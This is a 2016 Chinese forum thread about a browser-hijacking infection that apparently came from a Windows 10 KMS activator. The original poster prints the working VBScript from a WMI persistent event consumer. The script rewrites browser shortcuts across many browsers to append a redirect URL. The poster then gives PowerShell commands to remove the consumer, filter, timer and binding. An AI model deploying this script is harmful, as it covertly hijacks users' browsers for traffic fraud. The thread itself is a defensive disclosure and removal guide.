论坛 › 系统与软件区 › 【原创】用了KMS10中招, 浏览器老被加尾巴怎么办, 看过来

sheds 发表于 2016-3-20 15:47

【原创】用了KMS10中招, 浏览器老被加尾巴怎么办, 看过来

本帖最后由 sheds 于 2016-5-7 08:30 编辑

装了Win10, 要激活, 于是论坛下载了一个KMS10激活, (我是很相信论坛的啊, 没想到...)
结果浏览器总是被加小尾巴跳转到hao123

系统目录的KMS10文件夹删除了, 注册表搜索删除了. 快捷方式手动清理干净了, 可是没用啊
没用啊, 怎么办... Explorer进程加载的DLL 系统服务, 观察一圈没发现异常啊.网上百度, Google好多圈
一点用也没, 都是些抄来抄去的贴子.重装系统, 这不符合我的风格呀(其实是软件太多, 重装太麻烦)

于是装了一个火绒(这里没有推广的意思,本来想装个COMODO的, 结果不支持WIN10), 用HIPS发现

scrcons.exe 他在修改快捷方式. 于是百度之, 引出来WMI, 仔细一看, 乖乖, 三无后门
(“三无”后门的核心就是WMI中的永久事件消费者ActiveScriptEventConsumer)


于是网上下载了一个工具WIMExplorer 这里贴个下载地址 http://www.ks-soft.net/hostmon.eng/wmi/
一看 ActiveScriptEventConsumer 里面果然有一个vbs脚本再一看内容, 这不正是查找多日的小尾巴吗, 果断删除
从此世界清静了

看看小尾巴的脚本
On Error Resume Next
Const link = "http://hao.qquu8.com/?v=108&m=yx"
Const link360 = "http://hao.qquu8.com/?v=108&m=yx&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\shome\Desktop,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\shome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = Split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next
lnkpathsArr = Split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
    If fso.FolderExists(oFolder) Then
      For Each file In fso.GetFolder(oFolder).Files
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
                Set oShellLink = WshShell.CreateShortcut(file.Path)
                path = oShellLink.TargetPath
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
                If oDic.Exists(LCase(name)) Then
                  If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arguments = link360
                  Else
                        oShellLink.Arguments = link
                  End If
                  If file.Attributes And 1 Then
                        file.Attributes = file.Attributes - 1
                  End If
                  oShellLink.Save
                End If
            End If
      Next
    End If
Next

WMI查看工具

edgu 发表于 2016-3-20 15:49

不用下载任何工具

看清楚后缀是什么，注册表和c盘windows文件夹里删干净

桌面IE快捷方式删掉，换个纯净的上去

sheds 发表于 2016-3-20 15:50

除非你重装系统, 否则你查找文件注册表绝对找不到这个东西
不相信你下载一个激活试试

edgu 发表于 2016-3-20 15:57

sheds 发表于 2016-3-20 15:50
除非你重装系统, 否则你查找文件注册表绝对找不到这个东西
不相信你下载一个激活试试

别说这么绝对，这个月刚把一台机器里的IE改好了

也是在软件区下载了软件，然后中招

主页被改成了hao123，IE地址后缀是四个字母，具体记不得了

Revival 发表于 2016-3-20 15:58

无孔不入啊 从WIN7年代到WIN10都是裸奔啊。。。。不知道后续会不会不小心中招

aspan 发表于 2016-3-20 16:08

和相信不相信论坛有什么关系 ，真是够矫情

sheds 发表于 2016-3-20 16:16

aspan 发表于 2016-3-20 16:08
和相信不相信论坛有什么关系 ，真是够矫情

只是一个玩笑话, 看来是我矫情了

luck108 发表于 2016-3-20 16:18

sheds 发表于 2016-3-20 15:47
装了Win10, 要激活, 于是论坛下载了一个KMS10激活, (我是很相信论坛的啊, 没想到...)
结果浏览器总是被加 ...

具体是咋操作的？用文本编辑器？谢谢

starwutian 发表于 2016-3-20 16:35

楼主分享一个详细的步骤呗。同样的问题，浏览器被加小尾巴了。

sheds 发表于 2016-3-20 16:55

本帖最后由 sheds 于 2016-7-24 23:12 编辑

删除方法:

我这里的情况是如图这样的,用下面的命令方式可以删除病毒

以管理员身份运行PowerShell
执行以下命令(4条命令复制粘贴然后一起执行即可)

gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='VBScriptKids_filter'""" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name = 'VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID = 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __EventFilter -Filter "Name = 'VBScriptKids_filter'" | Remove-WmiObject

乌黑兔 发表于 2016-3-20 17:05

我的小尾巴好久了都没去掉，下了班回去搞起

freedown 发表于 2016-3-20 18:13

学习新知识。

luck108 发表于 2016-3-20 20:01

sheds 发表于 2016-3-20 16:55
我这里的情况是如图这样的,你下面的命令方式可以解决

以管理员身份运行PowerShell


谢谢，看明白了

猪在龙年 发表于 2016-3-20 22:13

学习了，曾经多次中招，不得已重装了事

endward 发表于 2016-3-21 00:21

学习了，曾经出现过这种情况，因为系统装有360全家桶，但是360查不出来，找了360的工作人员，他远程各种工具查找问题没找到，最后还是重装系统了事。

277266 发表于 2016-3-21 09:43

本帖最后由 277266 于 2016-3-21 10:05 编辑

看不明白啊！

找到了powershell，谢谢！希望能永远解决，被困扰很久很久了。

无数次诅咒这个网址和这个流氓软件。

中国软件业就是被周红衣这种流氓带向流氓方向的！

labazhou 发表于 2016-3-21 10:08

本帖最后由 labazhou 于 2016-3-21 18:05 编辑

前段时间也遇到了，这次回家试一下回家测试了一下，果然有这种情况，以前试了好多方法都没有办法，还是51NB好

liuxiao 发表于 2016-3-24 08:19

学习了，也中过招

277266 发表于 2016-3-24 09:46

edgu 发表于 2016-3-20 15:57
别说这么绝对，这个月刚把一台机器里的IE改好了

也是在软件区下载了软件，然后中招


过几天又不行了！呵呵.....。

当然，有可能你遇到并不是楼主说的这种情况。

如果是楼主说这种情况是绝对地。小马激活刚出来时，觉得挺不错的，原来就是百度养的狗！

kaiser888 发表于 2016-3-24 21:14

非常感谢，困扰很久了^g^

277266 发表于 2016-3-25 08:42

我怎么没有显示10楼？

Bzv 发表于 2016-3-30 10:37

谢谢，楼主，完美解决

琦安L 发表于 2016-3-30 16:40

这么好，谢了！

zyw520_2001 发表于 2016-3-31 15:52

為什麼我測試不行啊一固定到狀態欄就馬上出現了

zhangyongtao 发表于 2016-3-31 15:57

最烦WINDOWS 这一点
一不小心就中

karonhu 发表于 2016-4-2 20:11

用360治疗这个还是很有效果的

Jeff_Yuan 发表于 2016-4-8 23:23

@.@不会用

cafield2222 发表于 2016-4-9 02:04

good

cafield2222 发表于 2016-4-11 11:59

下了wmiexplorer但是弄不来，界面和2楼截图完全不一样啊。

理想奶牛 发表于 2016-4-11 16:37

刚好遇到这个问题，按楼主方式尝试一下

查看完整版本: 【原创】用了KMS10中招, 浏览器老被加尾巴怎么办, 看过来